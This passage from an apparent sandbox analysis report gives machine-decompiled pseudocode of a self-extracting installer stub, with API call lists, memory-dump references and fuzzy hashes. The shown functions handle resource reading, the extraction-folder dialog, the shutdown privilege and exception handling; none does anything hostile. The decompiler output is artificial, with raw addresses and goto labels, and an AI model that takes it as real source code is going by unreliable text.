                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E000C1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 000C1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000C1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 000C1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: cc35d44b5b21d4f4b46e893725280eebad5386312ef8332f63fc7314e13bf8bd
                                                                                                                                                                                                        • Instruction ID: 4312b155402821f429c679be266d689e3429af67d88de7dc5f0a2e3b9e201f3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc35d44b5b21d4f4b46e893725280eebad5386312ef8332f63fc7314e13bf8bd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D219A71B40205BBEB705BA19C4EFFF76B8EB87754F24002DFA06D6182D77988029661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x000c6cf7
                                                                                                                                                                                                        0x000c6d00
                                                                                                                                                                                                        0x000c6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000C6E26,000C1000), ref: 000C6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(000C6E26,?,000C6E26,000C1000), ref: 000C6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,000C6E26,000C1000), ref: 000C6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,000C6E26,000C1000), ref: 000C6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: 7e3165b3f8b389cba78e2a254c40e22e78e983b138576e195f4098d573c494dd
                                                                                                                                                                                                        • Instruction ID: 1d64b292c325542c1fcda826ad69faf374dcb6fd37907283d2e18d7f0c2f1a91
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e3165b3f8b389cba78e2a254c40e22e78e983b138576e195f4098d573c494dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49D0C93220010CBFFB002BF1EC0CE593F28EB4A21AF4D4000FB19C2060CA3A44518B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E000C3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E000C43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xc9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xc91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E000C44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xc91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xc91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xc91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xc91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E000C658A(0xc91e4, 0x104, 0xc1140);
                                                                                                                                                                                                        								_t27 = E000C58C8(0xc91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xc91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xc91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E000C597D(0xc91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xc91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xc91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E000C44B9(_t64, 0x54a, 0xc91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xc91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xc91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xc91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xc91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xc9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xc9a3c, 0x3e8, 0xc8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E000C4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xc87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E000C44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3437
                                                                                                                                                                                                        0x000c33c7
                                                                                                                                                                                                        0x000c33c9
                                                                                                                                                                                                        0x000c33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c33cc
                                                                                                                                                                                                        0x000c33ad
                                                                                                                                                                                                        0x000c33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c33b4
                                                                                                                                                                                                        0x000c3398
                                                                                                                                                                                                        0x000c3399
                                                                                                                                                                                                        0x000c339b
                                                                                                                                                                                                        0x000c339c
                                                                                                                                                                                                        0x000c339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c339d
                                                                                                                                                                                                        0x000c334c
                                                                                                                                                                                                        0x000c3351
                                                                                                                                                                                                        0x000c3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c335c
                                                                                                                                                                                                        0x000c3362
                                                                                                                                                                                                        0x000c3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3366
                                                                                                                                                                                                        0x000c3367
                                                                                                                                                                                                        0x000c3369
                                                                                                                                                                                                        0x000c336a
                                                                                                                                                                                                        0x000c336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c336b
                                                                                                                                                                                                        0x000c331c
                                                                                                                                                                                                        0x000c3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3329
                                                                                                                                                                                                        0x000c332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c332b
                                                                                                                                                                                                        0x000c324c
                                                                                                                                                                                                        0x000c324c
                                                                                                                                                                                                        0x000c324f
                                                                                                                                                                                                        0x000c32c8
                                                                                                                                                                                                        0x000c32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c32ce
                                                                                                                                                                                                        0x000c3251
                                                                                                                                                                                                        0x000c3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3271
                                                                                                                                                                                                        0x000c3277
                                                                                                                                                                                                        0x000c3279
                                                                                                                                                                                                        0x000c3298
                                                                                                                                                                                                        0x000c329d
                                                                                                                                                                                                        0x000c329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c32b0
                                                                                                                                                                                                        0x000c32b6
                                                                                                                                                                                                        0x000c32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c32be
                                                                                                                                                                                                        0x000c3280
                                                                                                                                                                                                        0x000c3289
                                                                                                                                                                                                        0x000c328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c328e
                                                                                                                                                                                                        0x000c327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,000C8598,00000200), ref: 000C3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 000C3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 000C3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 000C342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 000C343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-570518801
                                                                                                                                                                                                        • Opcode ID: 2ab98c7ea692512469060af4f171cc9c15181b91d3af6cb617e845c617a07c67
                                                                                                                                                                                                        • Instruction ID: 2a4d67e3d6b37e449b26f71d42d5c4ce4910da31c7bf2d6f9b50a47a3abc93da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab98c7ea692512469060af4f171cc9c15181b91d3af6cb617e845c617a07c67
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A5149703A02807BFBB55B355C4DFBF3998DB86B54F14C02CFA45961D1CAA8DF019261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xc9a3c = __ecx;
                                                                                                                                                                                                        				memset(0xc9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xc8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xc88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xc93ec = 1;
                                                                                                                                                                                                        				_t20 = E000C468F("TITLE", 0xc9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xc858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xc9a34;
                                                                                                                                                                                                        					if(E000C468F("EXTRACTOPT", 0xc9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xc9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xc9120 =  *0xc9120 & _t65;
                                                                                                                                                                                                        							if(E000C5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xc8a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xc8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xc8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E000C36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xc9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xc9a34 & 0x00000100) == 0 || ( *0xc8a38 & 0x00000001) != 0 || E000C18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E000C6517(_t57, 0x7d6, _t34, E000C19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E000C2390(0xc8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E000C44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E000C468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xc8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xc9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E000C44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E000C44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xc8588);
                                                                                                                                                                                                        										 *0xc9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x000c2e88
                                                                                                                                                                                                        0x000c2e88
                                                                                                                                                                                                        0x000c2e43
                                                                                                                                                                                                        0x000c2e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2e48
                                                                                                                                                                                                        0x000c2e30
                                                                                                                                                                                                        0x000c2e30
                                                                                                                                                                                                        0x000c2ef8
                                                                                                                                                                                                        0x000c2f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f01
                                                                                                                                                                                                        0x000c2d8a
                                                                                                                                                                                                        0x000c2d8f
                                                                                                                                                                                                        0x000c2da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2da3
                                                                                                                                                                                                        0x000c2dae
                                                                                                                                                                                                        0x000c2db4
                                                                                                                                                                                                        0x000c2dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2dca
                                                                                                                                                                                                        0x000c2dd3
                                                                                                                                                                                                        0x000c2df5
                                                                                                                                                                                                        0x000c2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2dd5
                                                                                                                                                                                                        0x000c2dde
                                                                                                                                                                                                        0x000c2de3
                                                                                                                                                                                                        0x000c2e04
                                                                                                                                                                                                        0x000c2e0a
                                                                                                                                                                                                        0x000c2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2e10
                                                                                                                                                                                                        0x000c2dd3
                                                                                                                                                                                                        0x000c2dbb
                                                                                                                                                                                                        0x000c2da1
                                                                                                                                                                                                        0x000c2d5b
                                                                                                                                                                                                        0x000c2d5b
                                                                                                                                                                                                        0x000c2d5d
                                                                                                                                                                                                        0x000c2d69
                                                                                                                                                                                                        0x000c2d6e
                                                                                                                                                                                                        0x000c2f06
                                                                                                                                                                                                        0x000c2f06
                                                                                                                                                                                                        0x000c2f06
                                                                                                                                                                                                        0x000c2d59
                                                                                                                                                                                                        0x000c2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2CF9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2D40
